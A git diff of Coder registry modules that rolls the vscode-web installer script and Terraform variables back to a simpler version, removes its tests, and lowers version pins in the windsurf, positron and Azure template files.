+    condition     = var.platform == "" || var.platform == "linux" || var.platform == "darwin" || var.platform == "alpine" || var.platform == "win32"
+    error_message = "Incorrect value. Please set either 'linux', 'darwin', or 'alpine' or 'win32'."
+  }
+}
+
 variable "workspace" {
   type        = string
   description = "Path to a .code-workspace file to open in vscode-web."
   default     = ""
 }
 
-variable "release_channel" {
-  type        = string
-  description = "The release channel for VS Code CLI (stable or insiders)."
-  default     = "stable"
-  validation {
-    condition     = var.release_channel == "stable" || var.release_channel == "insiders"
-    error_message = "Incorrect value. Please set either 'stable' or 'insiders'."
-  }
-}
-
-variable "commit_id" {
-  type        = string
-  description = "The commit SHA to use for the VS Code Server. Leave empty to use the latest version."
-  default     = ""
-}
-
 data "coder_workspace_owner" "me" {}
 data "coder_workspace" "me" {}
 
-locals {
-  settings_b64 = var.settings != {} ? base64encode(jsonencode(var.settings)) : ""
-}
-
 resource "coder_script" "vscode-web" {
   agent_id     = var.agent_id
   display_name = "VS Code Web"
@@ -181,7 +177,8 @@ resource "coder_script" "vscode-web" {
     INSTALL_PREFIX : var.install_prefix,
     EXTENSIONS : join(",", var.extensions),
     TELEMETRY_LEVEL : var.telemetry_level,
-    SETTINGS_B64 : local.settings_b64,
+    // This is necessary otherwise the quotes are stripped!
+    SETTINGS : replace(jsonencode(var.settings), "\"", "\\\""),
     OFFLINE : var.offline,
     USE_CACHED : var.use_cached,
     DISABLE_TRUST : var.disable_trust,
@@ -190,8 +187,8 @@ resource "coder_script" "vscode-web" {
     WORKSPACE : var.workspace,
     AUTO_INSTALL_EXTENSIONS : var.auto_install_extensions,
     SERVER_BASE_PATH : local.server_base_path,
-    RELEASE_CHANNEL : var.release_channel,
     COMMIT_ID : var.commit_id,
+    PLATFORM : var.platform,
   })
   run_on_start = true
 

registry/coder/modules/vscode-web/run.sh

@@ -1,417 +1,138 @@
 #!/usr/bin/env bash
 
 BOLD='\033[0;1m'
-RESET='\033[0m'
-CODE='\033[36;40;1m'
 EXTENSIONS=("${EXTENSIONS}")
+VSCODE_WEB="${INSTALL_PREFIX}/bin/code-server"
 
-# Merge settings from module with existing settings file
-# Uses jq if available, falls back to Python3 for deep merge
-merge_settings() {
-  local new_settings="$1"
-  local settings_file="$2"
-
-  if [ -z "$new_settings" ] || [ "$new_settings" = "{}" ]; then
-    return 0
-  fi
-
-  if [ ! -f "$settings_file" ]; then
-    mkdir -p "$(dirname "$settings_file")"
-    printf '%s\n' "$new_settings" > "$settings_file"
-    printf "Creating settings file...\n"
-    return 0
-  fi
-
-  local tmpfile
-  tmpfile="$(mktemp)"
-
-  if command -v jq > /dev/null 2>&1; then
-    if jq -s '.[0] * .[1]' "$settings_file" <(printf '%s\n' "$new_settings") > "$tmpfile" 2> /dev/null; then
-      mv "$tmpfile" "$settings_file"
-      printf "Merging settings...\n"
-      return 0
-    fi
-  fi
-
-  if command -v python3 > /dev/null 2>&1; then
-    if python3 -c "import json,sys;m=lambda a,b:{**a,**{k:m(a[k],v)if k in a and type(a[k])==type(v)==dict else v for k,v in b.items()}};print(json.dumps(m(json.load(open(sys.argv[1])),json.loads(sys.argv[2])),indent=2))" "$settings_file" "$new_settings" > "$tmpfile" 2> /dev/null; then
-      mv "$tmpfile" "$settings_file"
-      printf "Merging settings...\n"
-      return 0
-    fi
-  fi
-
-  rm -f "$tmpfile"
-  printf "Warning: Could not merge settings. Keeping existing settings.\n"
-  return 0
-}
-
-# Set extension directory argument
+# Set extension directory
 EXTENSION_ARG=""
 if [ -n "${EXTENSIONS_DIR}" ]; then
   EXTENSION_ARG="--extensions-dir=${EXTENSIONS_DIR}"
 fi
 
-# Set server base path argument
+# Set extension directory
 SERVER_BASE_PATH_ARG=""
 if [ -n "${SERVER_BASE_PATH}" ]; then
   SERVER_BASE_PATH_ARG="--server-base-path=${SERVER_BASE_PATH}"
 fi
 
-# Set disable workspace trust argument
+# Set disable workspace trust
 DISABLE_TRUST_ARG=""
 if [ "${DISABLE_TRUST}" = true ]; then
   DISABLE_TRUST_ARG="--disable-workspace-trust"
 fi
 
-# Check if code CLI is installed
-check_code_cli() {
-  if command -v code > /dev/null 2>&1; then
-    echo "code"
-    return 0
-  fi
-  if [ -f "${INSTALL_PREFIX}/bin/code" ]; then
-    echo "${INSTALL_PREFIX}/bin/code"
-    return 0
-  fi
-  return 1
+run_vscode_web() {
+  echo "👷 Running $VSCODE_WEB serve-local $EXTENSION_ARG $SERVER_BASE_PATH_ARG $DISABLE_TRUST_ARG --port ${PORT} --host 127.0.0.1 --accept-server-license-terms --without-connection-token --telemetry-level ${TELEMETRY_LEVEL} in the background..."
+  echo "Check logs at ${LOG_PATH}!"
+  "$VSCODE_WEB" serve-local "$EXTENSION_ARG" "$SERVER_BASE_PATH_ARG" "$DISABLE_TRUST_ARG" --port "${PORT}" --host 127.0.0.1 --accept-server-license-terms --without-connection-token --telemetry-level "${TELEMETRY_LEVEL}" > "${LOG_PATH}" 2>&1 &
 }
 
-# Check if code-server is installed (fallback option)
-check_code_server() {
-  if command -v code-server > /dev/null 2>&1; then
-    echo "code-server"
-    return 0
-  fi
-  if [ -f "${INSTALL_PREFIX}/bin/code-server" ]; then
-    echo "${INSTALL_PREFIX}/bin/code-server"
-    return 0
-  fi
-  return 1
-}
-
-# Find existing vscode-server binary (used by code serve-web internally)
-find_vscode_server() {
-  # Check common locations for pre-downloaded vscode-server
-  local server_dirs=(
-    "$HOME/.vscode-server/bin"
-    "$HOME/.vscode/cli/serve-web"
-  )
-  for dir in "$${server_dirs[@]}"; do
-    if [ -d "$dir" ]; then
-      # Find the most recent server version
-      local latest
-      latest=$(ls -t "$dir" 2> /dev/null | head -1)
-      if [ -n "$latest" ] && [ -f "$dir/$latest/bin/code-server" ]; then
-        echo "$dir/$latest/bin/code-server"
-        return 0
-      fi
-      if [ -n "$latest" ] && [ -f "$dir/$latest/code-server" ]; then
-        echo "$dir/$latest/code-server"
-        return 0
-      fi
-    fi
-  done
-  return 1
-}
-
-# Install VS Code CLI if not present
-install_code_cli() {
-  printf "$${BOLD}Installing VS Code CLI...$${RESET}\n"
-
-  # Detect architecture
-  ARCH=$(uname -m)
-  case "$ARCH" in
-    x86_64) ARCH="x64" ;;
-    aarch64 | arm64) ARCH="arm64" ;;
-    armv7l) ARCH="armhf" ;;
-    *)
-      echo "Unsupported architecture: $ARCH"
-      exit 1
-      ;;
-  esac
-
-  # Detect platform
-  # Note: VS Code CLI uses 'alpine' for all Linux distributions
-  PLATFORM=$(uname -s)
-  case "$PLATFORM" in
-    Linux)
-      PLATFORM="alpine"
-      ;;
-    Darwin)
-      PLATFORM="darwin"
-      ;;
-    *)
-      echo "Unsupported platform: $PLATFORM"
-      exit 1
-      ;;
-  esac
-
-  # Create install directory
-  mkdir -p "${INSTALL_PREFIX}/bin"
-
-  # Download VS Code CLI
-  CLI_URL="https://code.visualstudio.com/sha/download?build=${RELEASE_CHANNEL}&os=cli-$PLATFORM-$ARCH"
-  printf "Downloading VS Code CLI from %s\n" "$CLI_URL"
-
-  if command -v curl > /dev/null 2>&1; then
-    curl -fsSL "$CLI_URL" -o "/tmp/vscode-cli.tar.gz"
-  elif command -v wget > /dev/null 2>&1; then
-    wget -q "$CLI_URL" -O "/tmp/vscode-cli.tar.gz"
-  else
-    echo "Neither curl nor wget is available. Please install one of them."
-    exit 1
-  fi
-
-  # Extract CLI
-  tar -xzf /tmp/vscode-cli.tar.gz -C "${INSTALL_PREFIX}/bin"
-  rm -f /tmp/vscode-cli.tar.gz
-
-  # The CLI binary is named 'code'
-  if [ -f "${INSTALL_PREFIX}/bin/code" ]; then
-    chmod +x "${INSTALL_PREFIX}/bin/code"
-    export PATH="${INSTALL_PREFIX}/bin:$PATH"
-    printf "$${BOLD}VS Code CLI installed successfully.$${RESET}\n"
-  else
-    echo "Failed to install VS Code CLI"
-    exit 1
-  fi
-}
-
-# Run VS Code Web using the code CLI (serve-web command)
-run_vscode_web_cli() {
-  local CODE_CMD="$1"
-
-  # Build the command arguments
-  ARGS="serve-web --port ${PORT} --host 127.0.0.1 --accept-server-license-terms --without-connection-token --telemetry-level ${TELEMETRY_LEVEL}"
-
-  if [ -n "$EXTENSION_ARG" ]; then
-    ARGS="$ARGS $EXTENSION_ARG"
-  fi
-
-  if [ -n "$SERVER_BASE_PATH_ARG" ]; then
-    ARGS="$ARGS $SERVER_BASE_PATH_ARG"
-  fi
-
-  if [ -n "$DISABLE_TRUST_ARG" ]; then
-    ARGS="$ARGS $DISABLE_TRUST_ARG"
-  fi
-
-  if [ -n "${COMMIT_ID}" ]; then
-    ARGS="$ARGS --commit-id ${COMMIT_ID}"
-  fi
-
-  printf "Starting VS Code Web on port ${PORT}...\n"
-  printf "Check logs at ${LOG_PATH}\n"
-
-  # shellcheck disable=SC2086
-  "$CODE_CMD" $ARGS > "${LOG_PATH}" 2>&1 &
-}
-
-# Run VS Code Web using code-server (fallback for offline mode)
-run_code_server() {
-  local SERVER_CMD="$1"
-
-  printf "Starting code-server on port ${PORT}...\n"
-  printf "Check logs at ${LOG_PATH}\n"
-
-  # Build arguments for code-server
-  ARGS="--port ${PORT} --host 127.0.0.1 --auth none"
-
-  if [ -n "$EXTENSION_ARG" ]; then
-    ARGS="$ARGS $EXTENSION_ARG"
-  fi
-
-  # shellcheck disable=SC2086
-  "$SERVER_CMD" $ARGS > "${LOG_PATH}" 2>&1 &
-}
-
-# Run VS Code Web using vscode-server binary directly
-run_vscode_server() {
-  local SERVER_CMD="$1"
-
-  printf "Starting VS Code Server on port ${PORT}...\n"
-  printf "Check logs at ${LOG_PATH}\n"
-
-  # Build arguments for vscode-server
-  ARGS="--port ${PORT} --host 127.0.0.1 --without-connection-token --accept-server-license-terms --telemetry-level ${TELEMETRY_LEVEL}"
-
-  if [ -n "$EXTENSION_ARG" ]; then
-    ARGS="$ARGS $EXTENSION_ARG"
-  fi
-
-  if [ -n "$SERVER_BASE_PATH_ARG" ]; then
-    ARGS="$ARGS $SERVER_BASE_PATH_ARG"
-  fi
-
-  # shellcheck disable=SC2086
-  "$SERVER_CMD" serve-local $ARGS > "${LOG_PATH}" 2>&1 &
-}
-
-# Install a single extension by downloading VSIX from marketplace
-install_extension_vsix() {
-  local ext_id="$1"
-  local publisher
-  local ext_name
-  publisher="$${ext_id%%.*}"
-  ext_name="$${ext_id#*.}"
-
-  # Download VSIX from marketplace
-  local vsix_url="https://$publisher.gallery.vsassets.io/_apis/public/gallery/publisher/$publisher/extension/$ext_name/latest/assetbyname/Microsoft.VisualStudio.Services.VSIXPackage"
-  local tmp_vsix="/tmp/ext-$ext_id.vsix"
-  local tmp_dir="/tmp/ext-$ext_id"
-
-  if command -v curl > /dev/null 2>&1; then
-    curl -fsSL "$vsix_url" -o "$tmp_vsix" 2> /dev/null
-  elif command -v wget > /dev/null 2>&1; then
-    wget -q "$vsix_url" -O "$tmp_vsix" 2> /dev/null
-  else
-    echo "Failed to install extension $ext_id: neither curl nor wget available"
-    return 1
-  fi
-
-  if [ ! -f "$tmp_vsix" ]; then
-    echo "Failed to download extension: $ext_id"
-    return 1
-  fi
-
-  # Extract VSIX (it's a ZIP file)
-  rm -rf "$tmp_dir"
-  mkdir -p "$tmp_dir"
-  if ! unzip -q "$tmp_vsix" -d "$tmp_dir" 2> /dev/null; then
-    echo "Failed to extract extension: $ext_id"
-    rm -f "$tmp_vsix"
-    return 1
-  fi
-
-  # Get version from package.json
-  local version=""
-  if [ -f "$tmp_dir/extension/package.json" ]; then
-    version=$(grep -o '"version"[[:space:]]*:[[:space:]]*"[^"]*"' "$tmp_dir/extension/package.json" | head -1 | cut -d'"' -f4)
-  fi
-  if [ -z "$version" ]; then
-    version="0.0.0"
-  fi
-
-  # Install to extensions directory
-  local ext_dir="$HOME/.vscode-server/extensions/$ext_id-$version"
-  mkdir -p "$HOME/.vscode-server/extensions"
-  rm -rf "$ext_dir"
-  mv "$tmp_dir/extension" "$ext_dir"
-
-  # Cleanup
-  rm -rf "$tmp_vsix" "$tmp_dir"
-  printf "Extension $ext_id v$version installed successfully.\n"
-  return 0
-}
-
-install_extensions() {
-  # Install specified extensions
-  IFS=',' read -r -a EXTENSIONLIST <<< "$${EXTENSIONS}"
-  for extension in "$${EXTENSIONLIST[@]}"; do
-    if [ -z "$extension" ]; then
-      continue
-    fi
-    printf "Installing extension $extension...\n"
-    install_extension_vsix "$extension"
-  done
-
-  # Auto-install extensions from workspace or folder
-  if [ "${AUTO_INSTALL_EXTENSIONS}" = true ]; then
-    if ! command -v jq > /dev/null; then
-      echo "jq is required to install extensions from a workspace file."
-    else
-      if [ -n "${WORKSPACE}" ] && [ -f "${WORKSPACE}" ]; then
-        printf "Installing extensions from %s...\n" "${WORKSPACE}"
-        extensions=$(sed 's|//.*||g' "${WORKSPACE}" | jq -r '(.extensions.recommendations // [])[]')
-        for extension in $extensions; do
-          install_extension_vsix "$extension"
-        done
-      else
-        WORKSPACE_DIR="$HOME"
-        if [ -n "${FOLDER}" ]; then
-          WORKSPACE_DIR="${FOLDER}"
-        fi
-        if [ -f "$WORKSPACE_DIR/.vscode/extensions.json" ]; then
-          printf "Installing extensions from %s/.vscode/extensions.json...\n" "$WORKSPACE_DIR"
-          extensions=$(sed 's|//.*||g' "$WORKSPACE_DIR/.vscode/extensions.json" | jq -r '.recommendations[]')
-          for extension in $extensions; do
-            install_extension_vsix "$extension"
-          done
-        fi
-      fi
-    fi
-  fi
-}
-
-# Apply machine settings (merge with existing if present)
-SETTINGS_B64='${SETTINGS_B64}'
-if [ -n "$SETTINGS_B64" ]; then
-  SETTINGS_JSON="$(echo -n "$SETTINGS_B64" | base64 -d)"
-  merge_settings "$SETTINGS_JSON" ~/.vscode-server/data/Machine/settings.json
+# Check if the settings file exists...
+if [ ! -f ~/.vscode-server/data/Machine/settings.json ]; then
+  echo "⚙️ Creating settings file..."
+  mkdir -p ~/.vscode-server/data/Machine
+  echo "${SETTINGS}" > ~/.vscode-server/data/Machine/settings.json
 fi
 
-# Determine which command to use
-CODE_CMD=""
-RUN_MODE=""
-
-# Check for code CLI first (preferred)
-if CODE_CMD=$(check_code_cli); then
-  printf "$${BOLD}Found VS Code CLI at $CODE_CMD$${RESET}\n"
-  RUN_MODE="cli"
+# Check if vscode-server is already installed for offline or cached mode
+if [ -f "$VSCODE_WEB" ]; then
+  if [ "${OFFLINE}" = true ] || [ "${USE_CACHED}" = true ]; then
+    echo "🥳 Found a copy of VS Code Web"
+    run_vscode_web
+    exit 0
+  fi
 fi
-
-# Handle offline mode
+# Offline mode always expects a copy of vscode-server to be present
 if [ "${OFFLINE}" = true ]; then
-  if [ -n "$CODE_CMD" ]; then
-    # Check if vscode-server is already downloaded (code serve-web won't need to download)
-    if VSCODE_SERVER=$(find_vscode_server); then
-      printf "Found cached VS Code Server at $VSCODE_SERVER\n"
-      printf "Using cached VS Code CLI.\n"
-      run_vscode_web_cli "$CODE_CMD"
-      exit 0
-    fi
-    # Code CLI exists but vscode-server not cached - try using it anyway
-    # (it might work if server was pre-downloaded, or fail gracefully)
-    printf "Warning: VS Code Server may not be cached. Attempting to start...\n"
-    printf "Using cached VS Code CLI.\n"
-    run_vscode_web_cli "$CODE_CMD"
-    exit 0
-  fi
-
-  # Try code-server as fallback for offline mode
-  if SERVER_CMD=$(check_code_server); then
-    printf "$${BOLD}Found code-server at $SERVER_CMD (offline fallback)$${RESET}\n"
-    run_code_server "$SERVER_CMD"
-    exit 0
-  fi
-
-  # Try vscode-server binary directly
-  if VSCODE_SERVER=$(find_vscode_server); then
-    printf "$${BOLD}Found VS Code Server at $VSCODE_SERVER (offline fallback)$${RESET}\n"
-    run_vscode_server "$VSCODE_SERVER"
-    exit 0
-  fi
-
-  echo "Offline mode enabled but no VS Code CLI, code-server, or cached VS Code Server found."
+  echo "Failed to find a copy of VS Code Web"
   exit 1
 fi
 
-# Handle use_cached mode
-if [ "${USE_CACHED}" = true ] && [ -n "$CODE_CMD" ]; then
-  printf "Using cached VS Code CLI.\n"
-  install_extensions
-  run_vscode_web_cli "$CODE_CMD"
-  exit 0
+# Create install prefix
+mkdir -p ${INSTALL_PREFIX}
+
+printf "$${BOLD}Installing Microsoft Visual Studio Code Server!\n"
+
+# Download and extract vscode-server
+ARCH=$(uname -m)
+case "$ARCH" in
+  x86_64) ARCH="x64" ;;
+  aarch64) ARCH="arm64" ;;
+  *)
+    echo "Unsupported architecture"
+    exit 1
+    ;;
+esac
+
+# Detect the platform
+if [ -n "${PLATFORM}" ]; then
+  DETECTED_PLATFORM="${PLATFORM}"
+elif [ -f /etc/alpine-release ] || grep -qi 'ID=alpine' /etc/os-release 2> /dev/null || command -v apk > /dev/null 2>&1; then
+  DETECTED_PLATFORM="alpine"
+elif [ "$(uname -s)" = "Darwin" ]; then
+  DETECTED_PLATFORM="darwin"
+else
+  DETECTED_PLATFORM="linux"
 fi
 
-# Install VS Code CLI if not present
-if [ -z "$CODE_CMD" ]; then
-  install_code_cli
-  CODE_CMD="${INSTALL_PREFIX}/bin/code"
-  RUN_MODE="cli"
+# Check if a specific VS Code Web commit ID was provided
+if [ -n "${COMMIT_ID}" ]; then
+  HASH="${COMMIT_ID}"
+else
+  HASH=$(curl -fsSL https://update.code.visualstudio.com/api/commits/stable/server-$DETECTED_PLATFORM-$ARCH-web | cut -d '"' -f 2)
+fi
+printf "$${BOLD}VS Code Web commit id version $HASH.\n"
+
+output=$(curl -fsSL "https://vscode.download.prss.microsoft.com/dbazure/download/stable/$HASH/vscode-server-$DETECTED_PLATFORM-$ARCH-web.tar.gz" | tar -xz -C "${INSTALL_PREFIX}" --strip-components 1)
+
+if [ $? -ne 0 ]; then
+  echo "Failed to install Microsoft Visual Studio Code Server: $output"
+  exit 1
+fi
+printf "$${BOLD}VS Code Web has been installed.\n"
+
+# Install each extension...
+IFS=',' read -r -a EXTENSIONLIST <<< "$${EXTENSIONS}"
+# shellcheck disable=SC2066
+for extension in "$${EXTENSIONLIST[@]}"; do
+  if [ -z "$extension" ]; then
+    continue
+  fi
+  printf "🧩 Installing extension $${CODE}$extension$${RESET}...\n"
+  output=$($VSCODE_WEB "$EXTENSION_ARG" --install-extension "$extension" --force)
+  if [ $? -ne 0 ]; then
+    echo "Failed to install extension: $extension: $output"
+  fi
+done
+
+if [ "${AUTO_INSTALL_EXTENSIONS}" = true ]; then
+  if ! command -v jq > /dev/null; then
+    echo "jq is required to install extensions from a workspace file."
+  else
+    # Prefer WORKSPACE if set and points to a file
+    if [ -n "${WORKSPACE}" ] && [ -f "${WORKSPACE}" ]; then
+      printf "🧩 Installing extensions from %s...\n" "${WORKSPACE}"
+      # Strip single-line comments then parse .extensions.recommendations[]
+      extensions=$(sed 's|//.*||g' "${WORKSPACE}" | jq -r '(.extensions.recommendations // [])[]')
+      for extension in $extensions; do
+        $VSCODE_WEB "$EXTENSION_ARG" --install-extension "$extension" --force
+      done
+    else
+      # Fallback to folder-based .vscode/extensions.json (existing behavior)
+      WORKSPACE_DIR="$HOME"
+      if [ -n "${FOLDER}" ]; then
+        WORKSPACE_DIR="${FOLDER}"
+      fi
+      if [ -f "$WORKSPACE_DIR/.vscode/extensions.json" ]; then
+        printf "🧩 Installing extensions from %s/.vscode/extensions.json...\n" "$WORKSPACE_DIR"
+        extensions=$(sed 's|//.*||g' "$WORKSPACE_DIR/.vscode/extensions.json" | jq -r '.recommendations[]')
+        for extension in $extensions; do
+          $VSCODE_WEB "$EXTENSION_ARG" --install-extension "$extension" --force
+        done
+      fi
+    fi
+  fi
 fi
 
-# Install extensions and run VS Code Web
-install_extensions
-run_vscode_web_cli "$CODE_CMD"
+run_vscode_web

registry/coder/modules/vscode-web/vscode-web.tftest.hcl

@@ -1,151 +0,0 @@
-run "required_vars" {
-  command = plan
-
-  variables {
-    agent_id       = "foo"
-    accept_license = true
-  }
-}
-
-run "accept_license_required" {
-  command = plan
-
-  variables {
-    agent_id       = "foo"
-    accept_license = false
-  }
-
-  expect_failures = [
-    var.accept_license
-  ]
-}
-
-run "offline_and_use_cached_conflict" {
-  command = plan
-
-  variables {
-    agent_id       = "foo"
-    accept_license = true
-    use_cached     = true
-    offline        = true
-  }
-
-  expect_failures = [
-    resource.coder_script.vscode-web
-  ]
-}
-
-run "offline_disallows_extensions" {
-  command = plan
-
-  variables {
-    agent_id       = "foo"
-    accept_license = true
-    offline        = true
-    extensions     = ["ms-python.python", "golang.go"]
-  }
-
-  expect_failures = [
-    resource.coder_script.vscode-web
-  ]
-}
-
-run "workspace_and_folder_conflict" {
-  command = plan
-
-  variables {
-    agent_id       = "foo"
-    accept_license = true
-    folder         = "/home/coder/project"
-    workspace      = "/home/coder/project.code-workspace"
-  }
-
-  expect_failures = [
-    resource.coder_script.vscode-web
-  ]
-}
-
-run "url_with_folder_query" {
-  command = plan
-
-  variables {
-    agent_id       = "foo"
-    accept_license = true
-    folder         = "/home/coder/project"
-    port           = 13338
-  }
-
-  assert {
-    condition     = resource.coder_app.vscode-web.url == "http://localhost:13338?folder=%2Fhome%2Fcoder%2Fproject"
-    error_message = "coder_app URL must include encoded folder query param"
-  }
-}
-
-run "url_with_workspace_query" {
-  command = plan
-
-  variables {
-    agent_id       = "foo"
-    accept_license = true
-    workspace      = "/home/coder/project.code-workspace"
-    port           = 13338
-  }
-
-  assert {
-    condition     = resource.coder_app.vscode-web.url == "http://localhost:13338?workspace=%2Fhome%2Fcoder%2Fproject.code-workspace"
-    error_message = "coder_app URL must include encoded workspace query param"
-  }
-}
-
-run "release_channel_stable" {
-  command = plan
-
-  variables {
-    agent_id        = "foo"
-    accept_license  = true
-    release_channel = "stable"
-  }
-}
-
-run "release_channel_insiders" {
-  command = plan
-
-  variables {
-    agent_id        = "foo"
-    accept_license  = true
-    release_channel = "insiders"
-  }
-}
-
-run "release_channel_invalid" {
-  command = plan
-
-  variables {
-    agent_id        = "foo"
-    accept_license  = true
-    release_channel = "invalid"
-  }
-
-  expect_failures = [
-    var.release_channel
-  ]
-}
-
-run "commit_id_empty_by_default" {
-  command = plan
-
-  variables {
-    agent_id       = "foo"
-    accept_license = true
-  }
-}
-
-run "commit_id_with_value" {
-  command = plan
-
-  variables {
-    agent_id       = "foo"
-    accept_license = true
-    commit_id      = "e54c774e0add60467559eb0d1e229c6452cf8447"
-  }
-}

registry/coder/modules/windsurf/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "windsurf" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/windsurf/coder"
-  version  = "1.3.1"
+  version  = "1.3.0"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ module "windsurf" {
 module "windsurf" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/windsurf/coder"
-  version  = "1.3.1"
+  version  = "1.3.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }
@@ -45,7 +45,7 @@ The following example configures Windsurf to use the GitHub MCP server with auth
 module "windsurf" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/windsurf/coder"
-  version  = "1.3.1"
+  version  = "1.3.0"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
   mcp = jsonencode({

registry/coder/modules/windsurf/main.tf

@@ -65,7 +65,7 @@ locals {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
+  version = "1.0.0"
 
   agent_id = var.agent_id
 

registry/coder/templates/azure-linux/README.md

@@ -27,21 +27,8 @@ This template provisions the following resources:
 
 - Azure VM (ephemeral, deleted on stop)
 - Managed disk (persistent, mounted to `/home/coder`)
-- Resource group, virtual network, subnet, and network interface (persistent, required by the managed disk and VM)
 
-### What happens on stop
-
-When a workspace is **stopped**, only the VM is destroyed. The managed disk, resource group, virtual network, subnet, and network interface all persist. This is by design — the managed disk retains your `/home/coder` data across workspace restarts, and the other resources remain because the disk depends on them.
-
-This means you will see these Azure resources in your subscription even when a workspace is stopped. This is expected behavior.
-
-### What happens on delete
-
-When a workspace is **deleted**, all resources are destroyed, including the resource group, networking resources, and managed disk.
-
-### Workspace restarts
-
-Since the VM is ephemeral, any tools or files outside of the home directory are not persisted across restarts. To pre-bake tools into the workspace (e.g. `python3`), modify the VM image, or use a [startup script](https://registry.terraform.io/providers/coder/coder/latest/docs/resources/script). Alternatively, individual developers can [personalize](https://coder.com/docs/dotfiles) their workspaces with dotfiles.
+This means, when the workspace restarts, any tools or files outside of the home directory are not persisted. To pre-bake tools into the workspace (e.g. `python3`), modify the VM image, or use a [startup script](https://registry.terraform.io/providers/coder/coder/latest/docs/resources/script). Alternatively, individual developers can [personalize](https://coder.com/docs/dotfiles) their workspaces with dotfiles.
 
 > [!NOTE]
 > This template is designed to be a starting point! Edit the Terraform to extend the template to support your use case.

registry/cytoshahar/modules/positron/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "positron" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/cytoshahar/positron/coder"
-  version  = "1.0.2"
+  version  = "1.0.1"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ module "positron" {
 module "positron" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/cytoshahar/positron/coder"
-  version  = "1.0.2"
+  version  = "1.0.1"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }

registry/cytoshahar/modules/positron/main.tf

@@ -41,13 +41,13 @@ variable "group" {
 variable "slug" {
   type        = string
   description = "The slug of the app."
-  default     = "positron"
+  default     = "cursor"
 }
 
 variable "display_name" {
   type        = string
   description = "The display name of the app."
-  default     = "Positron Desktop"
+  default     = "Cursor Desktop"
 }
 
 data "coder_workspace" "me" {}
@@ -55,7 +55,7 @@ data "coder_workspace_owner" "me" {}
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
+  version = "1.0.0"
 
   agent_id = var.agent_id